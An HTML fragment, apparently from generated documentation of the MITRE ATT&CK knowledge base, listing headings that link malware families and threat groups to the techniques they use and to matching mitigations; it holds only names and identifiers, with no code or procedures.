<div class="sect2">
<h3 id="_xagentosx_s0161_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_xagentosx_s0161_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_xagentosx_s0161_uses_standard_application_layer_protocol_t1071">XAgentOSX (S0161) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_streamex_s0142_uses_security_software_discovery_t1063"><a class="anchor" href="#_streamex_s0142_uses_security_software_discovery_t1063"></a><a class="link" href="#_streamex_s0142_uses_security_software_discovery_t1063">StreamEx (S0142) uses Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_pinchduke_s0048_uses_system_information_discovery_t1082"><a class="anchor" href="#_pinchduke_s0048_uses_system_information_discovery_t1082"></a><a class="link" href="#_pinchduke_s0048_uses_system_information_discovery_t1082">PinchDuke (S0048) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_mimikatz_s0002_uses_pass_the_ticket_t1097"><a class="anchor" href="#_mimikatz_s0002_uses_pass_the_ticket_t1097"></a><a class="link" href="#_mimikatz_s0002_uses_pass_the_ticket_t1097">Mimikatz (S0002) uses Pass the Ticket (T1097)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_data_compressed_t1002"><a class="anchor" href="#_menupass_g0045_uses_data_compressed_t1002"></a><a class="link" href="#_menupass_g0045_uses_data_compressed_t1002">menuPass (G0045) uses Data Compressed (T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_regin_s0019_uses_standard_non_application_layer_protocol_t1095"><a class="anchor" href="#_regin_s0019_uses_standard_non_application_layer_protocol_t1095"></a><a class="link" href="#_regin_s0019_uses_standard_non_application_layer_protocol_t1095">Regin (S0019) uses Standard Non-Application Layer Protocol (T1095)</a></h3>
</div>
<div class="sect2">
<h3 id="_agent_btz_s0092_uses_data_encrypted_t1022"><a class="anchor" href="#_agent_btz_s0092_uses_data_encrypted_t1022"></a><a class="link" href="#_agent_btz_s0092_uses_data_encrypted_t1022">Agent.btz (S0092) uses Data Encrypted (T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_mobileorder_s0079_uses_exfiltration_over_command_and_control_channel_t1041"><a class="anchor" href="#_mobileorder_s0079_uses_exfiltration_over_command_and_control_channel_t1041"></a><a class="link" href="#_mobileorder_s0079_uses_exfiltration_over_command_and_control_channel_t1041">MobileOrder (S0079) uses Exfiltration Over Command and Control Channel (T1041)</a></h3>
</div>
<div class="sect2">
<h3 id="_moonwind_s0149_uses_file_deletion_t1107"><a class="anchor" href="#_moonwind_s0149_uses_file_deletion_t1107"></a><a class="link" href="#_moonwind_s0149_uses_file_deletion_t1107">MoonWind (S0149) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_office_application_startup_mitigation_t1137_mitigates_office_application_startup_t1137"><a class="anchor" href="#_office_application_startup_mitigation_t1137_mitigates_office_application_startup_t1137"></a><a class="link" href="#_office_application_startup_mitigation_t1137_mitigates_office_application_startup_t1137">Office Application Startup Mitigation (T1137) mitigates Office Application Startup (T1137)</a></h3>
</div>
<div class="sect2">
<h3 id="_downpaper_s0186_uses_system_information_discovery_t1082"><a class="anchor" href="#_downpaper_s0186_uses_system_information_discovery_t1082"></a><a class="link" href="#_downpaper_s0186_uses_system_information_discovery_t1082">DownPaper (S0186) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_deep_panda_g0009_uses_net_s0039"><a class="anchor" href="#_deep_panda_g0009_uses_net_s0039"></a><a class="link" href="#_deep_panda_g0009_uses_net_s0039">Deep Panda (G0009) uses Net (S0039)</a></h3>
</div>
<div class="sect2">
<h3 id="_flipside_s0173_uses_connection_proxy_t1090"><a class="anchor" href="#_flipside_s0173_uses_connection_proxy_t1090"></a><a class="link" href="#_flipside_s0173_uses_connection_proxy_t1090">FLIPSIDE (S0173) uses Connection Proxy (T1090)</a></h3>
</div>
<div class="sect2">
<h3 id="_pass_the_ticket_mitigation_t1097_mitigates_pass_the_ticket_t1097"><a class="anchor" href="#_pass_the_ticket_mitigation_t1097_mitigates_pass_the_ticket_t1097"></a><a class="link" href="#_pass_the_ticket_mitigation_t1097_mitigates_pass_the_ticket_t1097">Pass the Ticket Mitigation (T1097) mitigates Pass the Ticket (T1097)</a></h3>
</div>
<div class="sect2">
<h3 id="_multiband_communication_mitigation_t1026_mitigates_multiband_communication_t1026"><a class="anchor" href="#_multiband_communication_mitigation_t1026_mitigates_multiband_communication_t1026"></a><a class="link" href="#_multiband_communication_mitigation_t1026_mitigates_multiband_communication_t1026">Multiband Communication Mitigation (T1026) mitigates Multiband Communication (T1026)</a></h3>
</div>
<div class="sect2">
<h3 id="_sys10_s0060_uses_system_information_discovery_t1082"><a class="anchor" href="#_sys10_s0060_uses_system_information_discovery_t1082"></a><a class="link" href="#_sys10_s0060_uses_system_information_discovery_t1082">Sys10 (S0060) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_downpaper_s0186_uses_command_line_interface_t1059"><a class="anchor" href="#_downpaper_s0186_uses_command_line_interface_t1059"></a><a class="link" href="#_downpaper_s0186_uses_command_line_interface_t1059">DownPaper (S0186) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_regsvr32_t1117"><a class="anchor" href="#_apt32_g0050_uses_regsvr32_t1117"></a><a class="link" href="#_apt32_g0050_uses_regsvr32_t1117">APT32 (G0050) uses Regsvr32 (T1117)</a></h3>
</div>
<div class="sect2">
<h3 id="_crimson_s0115_uses_process_discovery_t1057"><a class="anchor" href="#_crimson_s0115_uses_process_discovery_t1057"></a><a class="link" href="#_crimson_s0115_uses_process_discovery_t1057">Crimson (S0115) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_crimson_s0115_uses_screen_capture_t1113"><a class="anchor" href="#_crimson_s0115_uses_screen_capture_t1113"></a><a class="link" href="#_crimson_s0115_uses_screen_capture_t1113">Crimson (S0115) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_sowbug_g0054_uses_input_capture_t1056"><a class="anchor" href="#_sowbug_g0054_uses_input_capture_t1056"></a><a class="link" href="#_sowbug_g0054_uses_input_capture_t1056">Sowbug (G0054) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_zlib_s0086_uses_screen_capture_t1113"><a class="anchor" href="#_zlib_s0086_uses_screen_capture_t1113"></a><a class="link" href="#_zlib_s0086_uses_screen_capture_t1113">ZLib (S0086) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_h1n1_s0132_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_h1n1_s0132_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_h1n1_s0132_uses_standard_cryptographic_protocol_t1032">H1N1 (S0132) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_g0048_uses_rtm_s0148"><a class="anchor" href="#_rtm_g0048_uses_rtm_s0148"></a><a class="link" href="#_rtm_g0048_uses_rtm_s0148">RTM (G0048) uses RTM (S0148)</a></h3>
</div>
<div class="sect2">
<h3 id="_process_discovery_mitigation_t1057_mitigates_process_discovery_t1057"><a class="anchor" href="#_process_discovery_mitigation_t1057_mitigates_process_discovery_t1057"></a><a class="link" href="#_process_discovery_mitigation_t1057_mitigates_process_discovery_t1057">Process Discovery Mitigation (T1057) mitigates Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_zlib_s0086_uses_data_compressed_t1002"><a class="anchor" href="#_zlib_s0086_uses_data_compressed_t1002"></a><a class="link" href="#_zlib_s0086_uses_data_compressed_t1002">ZLib (S0086) uses Data Compressed (T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_h1n1_s0132_uses_command_line_interface_t1059"><a class="anchor" href="#_h1n1_s0132_uses_command_line_interface_t1059"></a><a class="link" href="#_h1n1_s0132_uses_command_line_interface_t1059">H1N1 (S0132) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_magic_hound_g0059_uses_screen_capture_t1113"><a class="anchor" href="#_magic_hound_g0059_uses_screen_capture_t1113"></a><a class="link" href="#_magic_hound_g0059_uses_screen_capture_t1113">Magic Hound (G0059) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_neteagle_s0034_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_neteagle_s0034_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_neteagle_s0034_uses_standard_cryptographic_protocol_t1032">NETEAGLE (S0034) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin6_g0037_uses_network_service_scanning_t1046"><a class="anchor" href="#_fin6_g0037_uses_network_service_scanning_t1046"></a><a class="link" href="#_fin6_g0037_uses_network_service_scanning_t1046">FIN6 (G0037) uses Network Service Scanning (T1046)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_clipboard_data_t1115"><a class="anchor" href="#_rtm_s0148_uses_clipboard_data_t1115"></a><a class="link" href="#_rtm_s0148_uses_clipboard_data_t1115">RTM (S0148) uses Clipboard Data (T1115)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_component_object_model_hijacking_t1122"><a class="anchor" href="#_advstoreshell_s0045_uses_component_object_model_hijacking_t1122"></a><a class="link" href="#_advstoreshell_s0045_uses_component_object_model_hijacking_t1122">ADVSTORESHELL (S0045) uses Component Object Model Hijacking (T1122)</a></h3>
</div>
<div class="sect2">
<h3 id="_powersource_s0145_uses_powershell_t1086"><a class="anchor" href="#_powersource_s0145_uses_powershell_t1086"></a><a class="link" href="#_powersource_s0145_uses_powershell_t1086">POWERSOURCE (S0145) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_xtunnel_s0117_uses_fallback_channels_t1008"><a class="anchor" href="#_xtunnel_s0117_uses_fallback_channels_t1008"></a><a class="link" href="#_xtunnel_s0117_uses_fallback_channels_t1008">XTunnel (S0117) uses Fallback Channels (T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_geminiduke_s0049_uses_account_discovery_t1087"><a class="anchor" href="#_geminiduke_s0049_uses_account_discovery_t1087"></a><a class="link" href="#_geminiduke_s0049_uses_account_discovery_t1087">GeminiDuke (S0049) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_system_network_connections_discovery_t1049"><a class="anchor" href="#_blackenergy_s0089_uses_system_network_connections_discovery_t1049"></a><a class="link" href="#_blackenergy_s0089_uses_system_network_connections_discovery_t1049">BlackEnergy (S0089) uses System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_network_service_scanning_t1046"><a class="anchor" href="#_apt34_g0057_uses_network_service_scanning_t1046"></a><a class="link" href="#_apt34_g0057_uses_network_service_scanning_t1046">APT34 (G0057) uses Network Service Scanning (T1046)</a></h3>
</div>
<div class="sect2">
<h3 id="_web_shell_mitigation_t1100_mitigates_web_shell_t1100"><a class="anchor" href="#_web_shell_mitigation_t1100_mitigates_web_shell_t1100"></a><a class="link" href="#_web_shell_mitigation_t1100_mitigates_web_shell_t1100">Web Shell Mitigation (T1100) mitigates Web Shell (T1100)</a></h3>
</div>
<div class="sect2">
<h3 id="_rover_s0090_uses_screen_capture_t1113"><a class="anchor" href="#_rover_s0090_uses_screen_capture_t1113"></a><a class="link" href="#_rover_s0090_uses_screen_capture_t1113">Rover (S0090) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_pisloader_s0124_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_pisloader_s0124_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_pisloader_s0124_uses_system_network_configuration_discovery_t1016">Pisloader (S0124) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_binary_padding_t1009"><a class="anchor" href="#_bronze_butler_g0060_uses_binary_padding_t1009"></a><a class="link" href="#_bronze_butler_g0060_uses_binary_padding_t1009">BRONZE BUTLER (G0060) uses Binary Padding (T1009)</a></h3>
</div>
<div class="sect2">
<h3 id="_naikon_g0019_uses_net_s0039"><a class="anchor" href="#_naikon_g0019_uses_net_s0039"></a><a class="link" href="#_naikon_g0019_uses_net_s0039">Naikon (G0019) uses Net (S0039)</a></h3>
</div>
<div class="sect2">
<h3 id="_riptide_s0003_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_riptide_s0003_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_riptide_s0003_uses_standard_cryptographic_protocol_t1032">RIPTIDE (S0003) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_access_token_manipulation_t1134"><a class="anchor" href="#_duqu_s0038_uses_access_token_manipulation_t1134"></a><a class="link" href="#_duqu_s0038_uses_access_token_manipulation_t1134">Duqu (S0038) uses Access Token Manipulation (T1134)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_system_network_connections_discovery_t1049"><a class="anchor" href="#_oilrig_g0049_uses_system_network_connections_discovery_t1049"></a><a class="link" href="#_oilrig_g0049_uses_system_network_connections_discovery_t1049">OilRig (G0049) uses System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_flashflood_s0036_uses_data_staged_t1074"><a class="anchor" href="#_flashflood_s0036_uses_data_staged_t1074"></a><a class="link" href="#_flashflood_s0036_uses_data_staged_t1074">FLASHFLOOD (S0036) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_derusbi_s0021_uses_fallback_channels_t1008"><a class="anchor" href="#_derusbi_s0021_uses_fallback_channels_t1008"></a><a class="link" href="#_derusbi_s0021_uses_fallback_channels_t1008">Derusbi (S0021) uses Fallback Channels (T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_new_service_t1050"><a class="anchor" href="#_duqu_s0038_uses_new_service_t1050"></a><a class="link" href="#_duqu_s0038_uses_new_service_t1050">Duqu (S0038) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_process_hollowing_t1093"><a class="anchor" href="#_cobalt_strike_s0154_uses_process_hollowing_t1093"></a><a class="link" href="#_cobalt_strike_s0154_uses_process_hollowing_t1093">Cobalt Strike (S0154) uses Process Hollowing (T1093)</a></h3>
</div>
<div class="sect2">
<h3 id="_riptide_s0003_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_riptide_s0003_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_riptide_s0003_uses_standard_application_layer_protocol_t1071">RIPTIDE (S0003) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_matroyshka_s0167_uses_scheduled_task_t1053"><a class="anchor" href="#_matroyshka_s0167_uses_scheduled_task_t1053"></a><a class="link" href="#_matroyshka_s0167_uses_scheduled_task_t1053">Matroyshka (S0167) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_lazarus_group_g0032_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_lazarus_group_g0032_uses_obfuscated_files_or_information_t1027">Lazarus Group (G0032) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004_uses_data_from_local_system_t1005"><a class="anchor" href="#_ke3chang_g0004_uses_data_from_local_system_t1005"></a><a class="link" href="#_ke3chang_g0004_uses_data_from_local_system_t1005">Ke3chang (G0004) uses Data from Local System (T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_geminiduke_s0049_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_geminiduke_s0049_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_geminiduke_s0049_uses_standard_application_layer_protocol_t1071">GeminiDuke (S0049) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_authentication_package_mitigation_t1131_mitigates_authentication_package_t1131"><a class="anchor" href="#_authentication_package_mitigation_t1131_mitigates_authentication_package_t1131"></a><a class="link" href="#_authentication_package_mitigation_t1131_mitigates_authentication_package_t1131">Authentication Package Mitigation (T1131) mitigates Authentication Package (T1131)</a></h3>
</div>
<div class="sect2">
<h3 id="_admin_338_g0018_uses_account_discovery_t1087"><a class="anchor" href="#_admin_338_g0018_uses_account_discovery_t1087"></a><a class="link" href="#_admin_338_g0018_uses_account_discovery_t1087">admin@338 (G0018) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_network_share_discovery_t1135"><a class="anchor" href="#_dragonfly_g0035_uses_network_share_discovery_t1135"></a><a class="link" href="#_dragonfly_g0035_uses_network_share_discovery_t1135">Dragonfly (G0035) uses Network Share Discovery (T1135)</a></h3>
</div>
<div class="sect2">
<h3 id="_httpbrowser_s0070_uses_file_deletion_t1107"><a class="anchor" href="#_httpbrowser_s0070_uses_file_deletion_t1107"></a><a class="link" href="#_httpbrowser_s0070_uses_file_deletion_t1107">HTTPBrowser (S0070) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_soundbite_s0157_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_soundbite_s0157_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_soundbite_s0157_uses_file_and_directory_discovery_t1083">SOUNDBITE (S0157) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_dust_storm_g0031_uses_misdat_s0083"><a class="anchor" href="#_dust_storm_g0031_uses_misdat_s0083"></a><a class="link" href="#_dust_storm_g0031_uses_misdat_s0083">Dust Storm (G0031) uses Misdat (S0083)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_coreshell_s0137"><a class="anchor" href="#_apt28_g0007_uses_coreshell_s0137"></a><a class="link" href="#_apt28_g0007_uses_coreshell_s0137">APT28 (G0007) uses CORESHELL (S0137)</a></h3>
</div>
<div class="sect2">
<h3 id="_moonwind_s0149_uses_commonly_used_port_t1043"><a class="anchor" href="#_moonwind_s0149_uses_commonly_used_port_t1043"></a><a class="link" href="#_moonwind_s0149_uses_commonly_used_port_t1043">MoonWind (S0149) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_misdat_s0083_uses_data_encoding_t1132"><a class="anchor" href="#_misdat_s0083_uses_data_encoding_t1132"></a><a class="link" href="#_misdat_s0083_uses_data_encoding_t1132">Misdat (S0083) uses Data Encoding (T1132)</a></h3>
</div>
<div class="sect2">
<h3 id="_cloudduke_s0054_uses_remote_file_copy_t1105"><a class="anchor" href="#_cloudduke_s0054_uses_remote_file_copy_t1105"></a><a class="link" href="#_cloudduke_s0054_uses_remote_file_copy_t1105">CloudDuke (S0054) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_carbanak_s0030_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_carbanak_s0030_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_carbanak_s0030_uses_standard_application_layer_protocol_t1071">Carbanak (S0030) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_account_discovery_t1087"><a class="anchor" href="#_apt3_g0022_uses_account_discovery_t1087"></a><a class="link" href="#_apt3_g0022_uses_account_discovery_t1087">APT3 (G0022) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_osinfo_s0165_uses_system_information_discovery_t1082"><a class="anchor" href="#_osinfo_s0165_uses_system_information_discovery_t1082"></a><a class="link" href="#_osinfo_s0165_uses_system_information_discovery_t1082">OSInfo (S0165) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt30_g0013_uses_spaceship_s0035"><a class="anchor" href="#_apt30_g0013_uses_spaceship_s0035"></a><a class="link" href="#_apt30_g0013_uses_spaceship_s0035">APT30 (G0013) uses SPACESHIP (S0035)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin5_g0053_uses_file_deletion_t1107"><a class="anchor" href="#_fin5_g0053_uses_file_deletion_t1107"></a><a class="link" href="#_fin5_g0053_uses_file_deletion_t1107">FIN5 (G0053) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_advstoreshell_s0045_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_advstoreshell_s0045_uses_file_and_directory_discovery_t1083">ADVSTORESHELL (S0045) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_peripheral_device_discovery_t1120"><a class="anchor" href="#_advstoreshell_s0045_uses_peripheral_device_discovery_t1120"></a><a class="link" href="#_advstoreshell_s0045_uses_peripheral_device_discovery_t1120">ADVSTORESHELL (S0045) uses Peripheral Device Discovery (T1120)</a></h3>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_shamoon_s0140_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_shamoon_s0140_uses_system_network_configuration_discovery_t1016">Shamoon (S0140) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_tasklist_s0057"><a class="anchor" href="#_apt1_g0006_uses_tasklist_s0057"></a><a class="link" href="#_apt1_g0006_uses_tasklist_s0057">APT1 (G0006) uses Tasklist (S0057)</a></h3>
</div>
<div class="sect2">
<h3 id="_private_keys_mitigation_t1145_mitigates_private_keys_t1145"><a class="anchor" href="#_private_keys_mitigation_t1145_mitigates_private_keys_t1145"></a><a class="link" href="#_private_keys_mitigation_t1145_mitigates_private_keys_t1145">Private Keys Mitigation (T1145) mitigates Private Keys (T1145)</a></h3>
</div>
<div class="sect2">
<h3 id="_mis_type_s0084_uses_masquerading_t1036"><a class="anchor" href="#_mis_type_s0084_uses_masquerading_t1036"></a><a class="link" href="#_mis_type_s0084_uses_masquerading_t1036">Mis-Type (S0084) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_mimikatz_s0002"><a class="anchor" href="#_bronze_butler_g0060_uses_mimikatz_s0002"></a><a class="link" href="#_bronze_butler_g0060_uses_mimikatz_s0002">BRONZE BUTLER (G0060) uses Mimikatz (S0002)</a></h3>
</div>
<div class="sect2">
<h3 id="_owaauth_s0072_uses_dll_side_loading_t1073"><a class="anchor" href="#_owaauth_s0072_uses_dll_side_loading_t1073"></a><a class="link" href="#_owaauth_s0072_uses_dll_side_loading_t1073">OwaAuth (S0072) uses DLL Side-Loading (T1073)</a></h3>
</div>
<div class="sect2">
<h3 id="_cozycar_s0046_uses_system_information_discovery_t1082"><a class="anchor" href="#_cozycar_s0046_uses_system_information_discovery_t1082"></a><a class="link" href="#_cozycar_s0046_uses_system_information_discovery_t1082">CozyCar (S0046) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_network_service_scanning_t1046"><a class="anchor" href="#_blackenergy_s0089_uses_network_service_scanning_t1046"></a><a class="link" href="#_blackenergy_s0089_uses_network_service_scanning_t1046">BlackEnergy (S0089) uses Network Service Scanning (T1046)</a></h3>
</div>
<div class="sect2">
<h3 id="_fakem_s0076_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_fakem_s0076_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_fakem_s0076_uses_custom_cryptographic_protocol_t1024">FakeM (S0076) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_poisonivy_s0012_uses_process_injection_t1055"><a class="anchor" href="#_poisonivy_s0012_uses_process_injection_t1055"></a><a class="link" href="#_poisonivy_s0012_uses_process_injection_t1055">PoisonIvy (S0012) uses Process Injection (T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_brute_force_t1110"><a class="anchor" href="#_lazarus_group_g0032_uses_brute_force_t1110"></a><a class="link" href="#_lazarus_group_g0032_uses_brute_force_t1110">Lazarus Group (G0032) uses Brute Force (T1110)</a></h3>
</div>
<div class="sect2">
<h3 id="_patchwork_g0040_uses_process_hollowing_t1093"><a class="anchor" href="#_patchwork_g0040_uses_process_hollowing_t1093"></a><a class="link" href="#_patchwork_g0040_uses_process_hollowing_t1093">Patchwork (G0040) uses Process Hollowing (T1093)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_data_compressed_t1002"><a class="anchor" href="#_apt3_g0022_uses_data_compressed_t1002"></a><a class="link" href="#_apt3_g0022_uses_data_compressed_t1002">APT3 (G0022) uses Data Compressed (T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_process_discovery_t1057"><a class="anchor" href="#_rtm_s0148_uses_process_discovery_t1057"></a><a class="link" href="#_rtm_s0148_uses_process_discovery_t1057">RTM (S0148) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_poisonivy_s0012"><a class="anchor" href="#_apt1_g0006_uses_poisonivy_s0012"></a><a class="link" href="#_apt1_g0006_uses_poisonivy_s0012">APT1 (G0006) uses PoisonIvy (S0012)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_reg_s0075"><a class="anchor" href="#_turla_g0010_uses_reg_s0075"></a><a class="link" href="#_turla_g0010_uses_reg_s0075">Turla (G0010) uses Reg (S0075)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt18_g0026_uses_hcdloader_s0071"><a class="anchor" href="#_apt18_g0026_uses_hcdloader_s0071"></a><a class="link" href="#_apt18_g0026_uses_hcdloader_s0071">APT18 (G0026) uses hcdLoader (S0071)</a></h3>
</div>
<div class="sect2">
<h3 id="_helminth_s0170_uses_data_staged_t1074"><a class="anchor" href="#_helminth_s0170_uses_data_staged_t1074"></a><a class="link" href="#_helminth_s0170_uses_data_staged_t1074">Helminth (S0170) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_pteranodon_s0147_uses_command_line_interface_t1059"><a class="anchor" href="#_pteranodon_s0147_uses_command_line_interface_t1059"></a><a class="link" href="#_pteranodon_s0147_uses_command_line_interface_t1059">Pteranodon (S0147) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_windows_remote_management_t1028"><a class="anchor" href="#_threat_group_3390_g0027_uses_windows_remote_management_t1028"></a><a class="link" href="#_threat_group_3390_g0027_uses_windows_remote_management_t1028">Threat Group-3390 (G0027) uses Windows Remote Management (T1028)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_system_information_discovery_t1082"><a class="anchor" href="#_apt3_g0022_uses_system_information_discovery_t1082"></a><a class="link" href="#_apt3_g0022_uses_system_information_discovery_t1082">APT3 (G0022) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_command_line_interface_t1059"><a class="anchor" href="#_apt34_g0057_uses_command_line_interface_t1059"></a><a class="link" href="#_apt34_g0057_uses_command_line_interface_t1059">APT34 (G0057) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_shotput_s0063_uses_remote_system_discovery_t1018"><a class="anchor" href="#_shotput_s0063_uses_remote_system_discovery_t1018"></a><a class="link" href="#_shotput_s0063_uses_remote_system_discovery_t1018">SHOTPUT (S0063) uses Remote System Discovery (T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_shamoon_s0140_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_shamoon_s0140_uses_obfuscated_files_or_information_t1027">Shamoon (S0140) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_fgdump_s0120_uses_credential_dumping_t1003"><a class="anchor" href="#_fgdump_s0120_uses_credential_dumping_t1003"></a><a class="link" href="#_fgdump_s0120_uses_credential_dumping_t1003">Fgdump (S0120) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_unknown_logger_s0130_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_unknown_logger_s0130_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_unknown_logger_s0130_uses_system_owner_user_discovery_t1033">Unknown Logger (S0130) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_modify_registry_mitigation_t1112_mitigates_modify_registry_t1112"><a class="anchor" href="#_modify_registry_mitigation_t1112_mitigates_modify_registry_t1112"></a><a class="link" href="#_modify_registry_mitigation_t1112_mitigates_modify_registry_t1112">Modify Registry Mitigation (T1112) mitigates Modify Registry (T1112)</a></h3>
</div>
<div class="sect2">
<h3 id="_port_monitors_mitigation_t1013_mitigates_port_monitors_t1013"><a class="anchor" href="#_port_monitors_mitigation_t1013_mitigates_port_monitors_t1013"></a><a class="link" href="#_port_monitors_mitigation_t1013_mitigates_port_monitors_t1013">Port Monitors Mitigation (T1013) mitigates Port Monitors (T1013)</a></h3>
</div>
<div class="sect2">
<h3 id="_deep_panda_g0009_uses_process_discovery_t1057"><a class="anchor" href="#_deep_panda_g0009_uses_process_discovery_t1057"></a><a class="link" href="#_deep_panda_g0009_uses_process_discovery_t1057">Deep Panda (G0009) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
